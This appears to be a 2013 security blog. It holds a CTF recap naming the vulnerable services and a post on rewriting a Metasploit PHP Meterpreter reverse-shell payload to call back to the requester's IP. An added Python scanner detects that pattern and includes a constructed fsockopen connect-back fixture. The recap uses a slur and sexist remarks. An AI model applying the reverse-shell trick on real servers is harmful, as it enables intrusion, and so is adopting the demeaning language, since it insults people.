Thursday, April 18, 2013

Ihack 2013: Image and Writeups.. Download VM

Sorry for the delay. I have not been well for the past few days; three days of sleepless nights affected my decision-making quite badly. Nevertheless we managed to set up everything with only a few hiccups.
Congratulations to the winner. Now the bad parts.


1. Quality versus Quantity

Setting up a network for 31 teams with VPN plus a few custom network rules/patches is not an easy task. Writing a score server is not an easy task either (a team from UTP even found an undefined-reference bug that let them bypass the challenge score server). Nevertheless I, oops, we did our best to ensure the game ran smoothly, with a few hiccups along the way.

So it was quite a disappointment when participants asked questions such as:

1. How do I set up a static IP?
2. How do I run the VPN?
3. Is there Internet or not?
4. Are there spare laptops/PCs? We didn't bring a PC/laptop.


Those of you who fall under that category should rot in the limbo of /dev/null.

2. Alliances and the Downfall of the Web.

Scores were not submitted until 9:00 pm onwards due to an improper configuration on my part that did not delegate the appropriate privileges to retrieve the flags. The TBDIan guys started owning the web, and the nightmares began around 9:00 pm onwards.

Strategy. Just like in the real world, we choose the right friends. In the cruel CTF world, choosing the right allies may help you secure your place in the competition.

3. One bug to rule 'em all.

There are 3 interesting daemons in the image. The majority of people reused the exploit from the web, which is a local traversal exploit via a PHP stream wrapper.
But I'm going to summarize them here:

1. VSFTPD backdoored exploit (writeup from Sindrosa).
2. Faggot daemon leaked address exploit (Daisuke wrote a nice writeup).
3. And the web: yeah, even the all-girl teams (does it sound sexist? who cares) managed to use this one...

Kudos to the winner, and here is the link to download the VM. There are no root accounts, so you need to boot it with rw init=/bin/bash to create a new account.
Image expires in 5 days.


Updated link

Download with Mega

Thursday, April 4, 2013

Leveraging Metasploit Meterpreter PHP the smart way.

As a Metasploit dog, you always try to integrate any vulnerability you find during a pentest with Metasploit. One of my favourite Metasploit payloads is php/meterpreter/reverse_tcp.

Now having said that, Metasploit is not really smart!!! (At least it is not efficient in every scenario.)
For example, suppose we generate the php/meterpreter/reverse_tcp payload.


Notice that you always need to specify the LHOST.

This causes an inconvenience if you are in an environment where your IP address keeps changing (for my sake, let's say I hate registering domains, or I am behind a shadowed network).

Checking the payload output:


You notice that the reverse remote IP address is hardcoded in the payload.
What we can do is replace the $ip string with the remote address server global, $_SERVER['REMOTE_ADDR'].



Now we can upload it anywhere we want and we don't have to set up our LHOST ever again :). This trick can also be applied to JSP and ASP files, but I leave that part to you guys.
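Defender-side counterpart to this trick, as an added example that is not part of the original post: a small Python taint check for uploaded PHP that flags an outbound socket call whose host argument is derived from $_SERVER['REMOTE_ADDR'], which is the tell-tale of a stager that connects back to whoever requests it. The two PHP fragments are constructed fixtures, not real payloads.

```python
import re

# Constructed fixture: the shape described above, with the hard-coded
# stager IP swapped for the requester's own address.
SAMPLE_PHP = r"""<?php
$ip = $_SERVER['REMOTE_ADDR'];
$port = 4444;
$f = fsockopen($ip, $port);
"""

# Constructed benign fixture: REMOTE_ADDR is only logged, and the socket
# call targets a fixed host.
BENIGN_PHP = r"""<?php
$client = $_SERVER['REMOTE_ADDR'];
error_log("visit from " . $client);
$db = mysqli_connect('db.internal', 'app', 'secret');
"""

# PHP functions that open an outbound network connection.
CONNECT_FUNCS = ("fsockopen", "pfsockopen", "socket_connect", "stream_socket_client")

VAR_ASSIGN = re.compile(r"\$(\w+)\s*=\s*([^;]+);")
CALL = re.compile(r"\b(" + "|".join(CONNECT_FUNCS) + r")\s*\(\s*([^,)]+)")
REMOTE_ADDR = re.compile(r"\$_SERVER\s*\[\s*['\"]REMOTE_ADDR['\"]\s*\]")


def taint_sources(src):
    """Names of variables assigned from $_SERVER['REMOTE_ADDR'], directly or
    through any chain of simple copies/expressions (fixed-point loop)."""
    tainted = set()
    changed = True
    while changed:
        changed = False
        for name, rhs in VAR_ASSIGN.findall(src):
            if name in tainted:
                continue
            if REMOTE_ADDR.search(rhs) or any(re.search(r"\$" + t + r"\b", rhs) for t in tainted):
                tainted.add(name)
                changed = True
    return tainted


def find_connect_back(src):
    """Return one finding per connect call whose host argument is the
    requester's address, either inline or via a tainted variable."""
    tainted = taint_sources(src)
    findings = []
    for func, host_arg in CALL.findall(src):
        host_arg = host_arg.strip()
        direct = REMOTE_ADDR.search(host_arg) is not None
        via_var = any(re.fullmatch(r"\$" + t, host_arg) for t in tainted)
        if direct or via_var:
            findings.append({"function": func, "host": host_arg})
    return findings
```

Run it over a web root's writable upload directories; a hit is worth a look even when the surrounding code is obfuscated, since the connect call and the REMOTE_ADDR read still have to appear in cleartext for PHP to execute them.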